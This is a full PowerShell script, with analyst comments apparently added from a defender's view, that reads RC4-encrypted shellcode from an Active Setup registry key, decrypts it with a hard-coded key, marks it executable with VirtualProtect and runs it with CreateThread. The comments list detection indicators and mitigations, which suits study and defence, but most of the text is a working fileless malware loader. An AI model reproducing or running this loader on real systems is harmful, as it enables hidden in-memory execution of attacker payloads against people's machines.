- # Read And Execute Rc4 Encrypted ShellCode From The Registry
- #
- # Analyst notes (defender view of what this script does, in order):
- #   1. Reads a byte blob from a registry value (Rc4Encoded64 or Rc4Encoded32,
- #      chosen by the bitness of the running PowerShell process).
- #   2. RC4-decrypts that blob in place with the hard-coded ASCII key "Phase".
- #   3. Marks the managed byte array PAGE_EXECUTE_READWRITE (0x40) with
- #      VirtualProtect, runs it on a new thread with CreateThread, then blocks
- #      in WaitForSingleObject until that thread exits.
- # The code that stages the blobs into the registry is not on this page.
- #
- # Indicators visible in this script text alone:
- #   - Add-Type with DllImport of kernel32!VirtualProtect / CreateThread /
- #     WaitForSingleObject from PowerShell (script block logging, Event 4104,
- #     records the full script text; AMSI scans the same text).
- #   - A read of HKCU\...\Active Setup\Installed Components\{GUID} for values
- #     named Rc4Encoded64 / Rc4Encoded32 (registry auditing / EDR telemetry).
- #   - An RWX region inside the .NET heap of the PowerShell host process whose
- #     content is the decrypted blob (memory scan for executable heap pages).
- # Mitigations: PowerShell Constrained Language Mode blocks Add-Type; WDAC /
- # AppLocker in enforced mode; EDR monitoring of VirtualProtect / CreateThread
- # calls made from script hosts.
- #
- # Set Registry Key
- # Registry path of the staging key. HKCU needs no admin rights; a GUID subkey
- # under Active Setup\Installed Components is also a location used for Active
- # Setup persistence (MITRE T1547.014) — this script only reads it.
- $sRegistryKey = 'HKCU:\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}';
- # Set Key For Key Stream
- # RC4 key material: the 5 ASCII bytes of "Phase", hard-coded in the script,
- # so the key (and therefore the plaintext) is recoverable from the text alone.
- [Byte[]]$bKey = [System.Text.Encoding]::ASCII.GetBytes("Phase");
- # Import Native Functions
- # C# P/Invoke declarations compiled at runtime below. Note the signatures:
- # lpStartAddress and lpAddress are declared as Byte[], so the managed
- # shellcode array itself is handed to the Win32 calls.
- $sCode = @"
- [DllImport("kernel32.dll")]
- public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, Byte[] lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
- [DllImport("kernel32.dll")]
- public static extern bool VirtualProtect(Byte[] lpAddress, uint dwSize, uint flNewProtect, [Out] IntPtr lpflOldProtect);
- [DllImport("kernel32.dll")]
- public static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
- "@
- # Make The Code Recognized By PowerShell
- # Add-Type compiles $sCode into a Win32Functions.Win32 type. On Windows
- # PowerShell 5.x this typically invokes csc.exe and leaves a temporary .cs/.dll
- # pair under %TEMP% (a forensic artefact); Constrained Language Mode blocks it.
- $pFunctions = Add-Type -memberDefinition $sCode -Name "Win32" -namespace Win32Functions -passthru
- # Declare Shellcode Array
- # NOTE(review): this is a cast expression, not an assignment — it does not
- # create $bShellCode; the variable is first assigned in the branch below.
- [Byte[]]$bShellCode;
- # Check Pointer Size To Check If x64
- # [IntPtr]::Size is the pointer size of the running PowerShell process (8 in a
- # 64-bit host), so the blob is chosen by process bitness, not by OS bitness.
- if ([IntPtr]::Size -eq 8) {
- # Load Encrypted x64 Shellcode From Registry
- # Get-ItemProperty yields a Byte[] when the value is REG_BINARY — presumably
- # how the blob was staged; the staging code is not on this page.
- $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded64).Rc4Encoded64;
- }else{
- # Load Encrypted x86 Shellcode From Registry
- $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded32).Rc4Encoded32;
- }
- # Define Byte Arrays That Are The Boxes
- # RC4 key-scheduling algorithm (KSA), written out inline: $s is the 256-byte
- # state array, $k is the key repeated cyclically to 256 bytes.
- [Byte[]]$s = New-Object Byte[] 256;
- [Byte[]]$k = New-Object Byte[] 256;
- # Loop from 0 to 255 to fill the boxes
- for ($i = 0; $i -lt 256; $i++){
- # Fill Box S With 0-255
- $s[$i] = [Byte]$i;
- # Fill Box K With (0-255)/dwKeyLen
- # Key byte repeated cyclically: $k[$i] = key[$i mod keylen].
- $k[$i] = $bKey[$i % $bKey.Length];
- }
- # Initialize j
- $j = 0;
- # Loop Through All 256 Bytes
- # KSA permutation pass: j = (j + S[i] + K[i]) mod 256, then swap S[i], S[j].
- for ($i = 0; $i -lt 256; $i++){
- $j = ($j + $s[$i] + $k[$i]) % 256;
- # Hold Temporary Value Of S[i] For Swapping
- $bSwap = $s[$i];
- # Set S[i] With S[j]
- $s[$i] = $s[$j];
- # Set S[j] With Old Value Of S[i]
- $s[$j] = $bSwap;
- }
- # Initialize i
- $i = 0;
- # Initialize j
- $j = 0;
- # Loop Through The Bytes In The Buffer
- # RC4 pseudo-random generation (PRGA) fused with the XOR: the ciphertext in
- # $bShellCode is decrypted in place, one byte per iteration. RC4 encryption
- # and decryption are the same operation, hence the "PlainText" wording below.
- for ($x = 0; $x -lt $bShellCode.Length; $x++){
- # Pseudo-Random Generation Algorithm
- $i = ($i + 1) % 256;
- $j = ($j + $s[$i]) % 256;
- # Hold Temporary Value Of S[i] For Swapping
- $bSwap = $s[$i];
- # Set S[i] With S[j]
- $s[$i] = $s[$j];
- # Set S[j] With Old Value Of S[i]
- $s[$j] = $bSwap;
- [int]$t = ($s[$i] + $s[$j]) % 256;
- # Xor PlainText With KeyStream
- # Keystream byte S[(S[i]+S[j]) mod 256] XOR ciphertext byte -> plaintext byte.
- $bShellCode[$x] = $bShellCode[$x] -bxor $s[$t];
- }
- # Check What Size We Should Allocate
- $dwSize = $bShellCode.Length;
- # Check Size Of ShellCode
- # Nothing runs if the registry value was empty or missing.
- if ($dwSize -gt 0x00000000){
- # Variable To Hold Old Protection Flags
- [Int[]]$dwOldProt = 0x00000000;
- # Get Pointer To $dwOldProt
- $pdwOldProt = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($dwOldProt,0)
- # Set Read/Write/Execute Flags On ShellCode
- # 0x40 = PAGE_EXECUTE_READWRITE applied to the managed array's backing
- # memory, i.e. an RWX page inside the .NET heap of the PowerShell host —
- # a strong memory-forensics / EDR indicator.
- if ($pFunctions::VirtualProtect($bShellCode, $dwSize, 0x40, $pdwOldProt)){
- # Create A New Thread To Execute Our ShellCode
- # Thread start address is the decrypted buffer; no loaded module backs it.
- $hThread = $pFunctions::CreateThread(0, 0, $bShellCode, 0, 0, 0);
- # Wait For Our Thread
- # -1 = INFINITE: the script blocks until the thread exits, so the PowerShell
- # process stays alive as the host of the running payload.
- $pFunctions::WaitForSingleObject($hThread, -1);
- }
- }
- www.malwaretech.com